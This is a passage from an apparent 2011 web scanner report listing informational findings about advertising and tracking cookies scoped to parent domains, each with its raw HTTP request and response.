P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="ZkB35ScPKzo2j8RUgljncqwHsEl4200sLz1/RBSGWv7fqe8f2SVyyjsUO0ggTTcNAEWJVItN7uipEAXBPoS5BlV3vvftHFXk"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 13:32:37 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHmH2CncBjgCUxdPmtmNewbE="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 02:20:37 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 13:32:37 GMT; Path=/
Set-Cookie: recs-66cb35a3a34965a97fad3ecb81fa21bf="55fxrxklP2A1i2wT2lqn3xAV/xRnycKLdQQRBzthWayajBy/AWr75gqeEWdmrn/niAKy873kx5zMinVlN2kIxR/R4X5i27VutF0sVigbHjE="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 13:37:37 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:32:37 GMT
Content-Length: 6914

outbrain_rater.returnedOdbData({'response':{'exec_time':28,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204759701','req_id':'20af375061d760bdaa910cf7a7a37302'},'score':{'preferred
...[SNIP]...
8.52. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.24621318303979933 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 13:32:28 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 13:32:28 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
8.53. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:38 GMT
Expires: Mon, 19 Dec 1983 13:31:38 GMT
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Set-Cookie: bbid=AF3T0Zvf1vDmRq2eOORXBaX-UQvWlgIUZO5XvUBOHKRHkojeDIbMFpwy0k092YGADE_VkxxdKe6RgzLMaIlJXL8-cU29eqJ7Wg; Domain=.brilig.com; Expires=Sat, 04-May-2041 13:31:38 GMT
Vary: Accept-Encoding
X-Brilig-D: D=2778
Connection: keep-alive
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=7814&1=999'width='0' height='0'></iframe>
8.54. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?site=125173;size=1x1;mimetype=img;rnd=(1305207060) HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anProfile=-webjz9+0+s0=(3l)+h=5m+1m=1+rv=(-5)+1j=57:1+rt='ADC1D6F3'+rs=c+1f=d+4=2m1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app3.ny
Set-Cookie: anProfile=3seu0d+0+s0=(3l)+h=5m+1m=1+rv=(-5)+rt='ADC1D6F3'+rs=c+1f=d+4=2m1; Domain=.pro-market.net; Expires=Sat, 13-Aug-2011 13:33:23 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:23 GMT
Connection: close

GIF89a.............!.......,...........D..;
8.55. http://pc2.yumenetworks.com/dynamic_btx/115_89795  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pc2.yumenetworks.com
Path:   /dynamic_btx/115_89795

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynamic_btx/115_89795 HTTP/1.1
Host: pc2.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0; ymf=0rO0ABXcFAadrgwA*; yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:17 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
YmBtHdr: @BT115_0_0
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAHMAAATLAAAAAA**; Domain=.yumenetworks.com; Expires=Mon, 11-Jul-2011 13:32:17 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

GIF89a.............!...
...,...........L..;
8.56. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.65%20safari%2F534.24&x=1305206911608&c=0&t=0&v=0&m=0&cp0=[]&cp1=[J-kzEAoPOk4AAFIsDHEAAABP] HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Wed, 10 Aug 2011 13:28:57; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=6585ea3a78e49172;path=/';
document.cookie = '__csv=6522d442e56f04a6|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('9d96e31a830b9c62'!='1'
...[SNIP]...
8.57. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==; rsiPus_ujqo="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8jRRkHy362Kg9l9j12Fne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMjJ4fF+m9lVo3qnvZVw4LutWRkL22Hw4Kz6k0cFJN0i2ZvAbE7Bstv7fR0SabeL+ZpICwVpx/u0HdlAUDc7lBUsfbQGZgZL0dTqOST8wX+PhUN1bZVgcaXGzTvtwVFXKYB2I3CNvw5vwJcg2LzV80dREIWCFz+RSmIHpscvV6HL3O21RAGNtSP9eKQiAqmxufZrUZtvKGTbQ4OUPapeYisBn/mLyG+DnrXih7YstoaXSNXNyBw9tnu/kYZ2Wy8ugsYdZdg79OiSRnJpTdWxYyMt5odORpHaCcTsLhgkMx+XFx0NxPpHWWMAviDZpD0+2ZoVe81SFPEBm3tp9yfV7bk5TiayC92SSkcgbZwy4cnmVqKB1ZG8TpmtgVwdnUNuLPq/2hXZ1A7Tf5+ubEWjoHbM9bi/yeQgVBOLh/6/UIjd4TnzEQCQOhk2wNe7pWzhqvI+5X8Cqmdvu6tpVa7C+Nk6GnfGUcGt8PFuFkcJ4tfVffnafOFFkLT1PebdMfm+f7hgIjxjRnkEBAUd4Fdp1eVbRfHnggvjmoPJwywKL7UxyIW//r3C7XOcp2c+yZ3MmMzd4W8THoM/Lw2eBqcUGUAYA2HLPurkH25Rs928sz4FlT5nUB9yXKc45760A7dHuQmUrDhIZleDb2rHzVChRvJNfuMCvH4iu6x+Irn3VJOuyy8lpbyeOR0wRziDxiiKjApW5nTVuxGG0RszGW7rAw7zvFLmiOwMfhEok8Cv90GF6Z0B10Fk8uIHCKCDzV87TdQHUFyTYmzoO34HXLt261b4BNW7ml1nYlv6e39/Gn44aib/c1kb7tHnM+/JPsM7LiVmw3tGtbWIJiaZ+VLboWASTqxZUKhSbzk2s3hi2ngwzW04eEE+RFHRAV1AYVJUXrhRtK3yminctNkCVsQ3O/MonDQRvrY0zxZSFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsY2pns2QyHQZ7oeS1FLsVa3QsqgRlPg+JJ2saXdJqe7hQZrzxfflyM60fA1SOkpM2UeuKkfrkhm14zhLHX3UBJ+6rY1WiZ9Kb3WsWx18RnkyX9hDtKk1ZcU9hmLPQjUstFZuV3vNJnO9eRadVgNGKD2nQQYghU1ZjZY2pPjItsnAco2oRRh7KAph2R4qy5kWFJEYjfrXIV5ow0VrekoHWL2s+EXgOaxc1cBJteHWs9iiLH4PhG0Hv/ES/wVObzmPW+72HqcTdMEaeaJerLU="; rsi_us_1000000="pUMV4x9HOCYc7H2Hdyd9gGYQxP6z87yv1/38fIfxXZ6hwopPJc1FCSfeEyinowUDu/6bHU/fppSZT968mAptVLd0gbR5UmTQx7YoMtsHUFy++96sia434M7cM6z8EDegCG0sJZJi2jDtzdF4Bo9ZEBaq7bUCfOnAlu2nto+pv7eVoA2lQLC4rSCbUn4f3OIOO9UPbm75nLJpjm/LzlQbrc2B3h7Ks3L+GK58JHL35KxtgSGRMVLv2jEjbDneecAAFdo+jT5YLix73R4OU6xpNVAlKXCKMxIbWoxbnl9NNfIUcezUALRReb4lPzpTmIJXGt8o8VyiAFcOKaf7Cll7pouSTtxLa808q4zjl3Si+70znE5U9HGXN9e0bM1nS8X3BVzvsR4lH1I0UVdEYSl8FssU6pOavCj/jzZ8dH93xxZ1kQqIfCzSdlAImPmYeIDywPZWHS4/c8M6xWdp3AS2760efiUUGVEja50v2Mgdj+FhNbzJBr6jjaLG1xPfKfiYRzGLqQJv70zj6yMXZOtcf2K6F8EPs02PSCRo8maGxM3jEqHlTBdWI15Ded0AEwZ+ldfwdW7LFpv9cYbjbVEGAEuNOw+jcfmaBErhNtUI56iyeKcMmZyqPjA/GY3kHS89R6I7UAgPbcSex8A2bvfG9m5Waang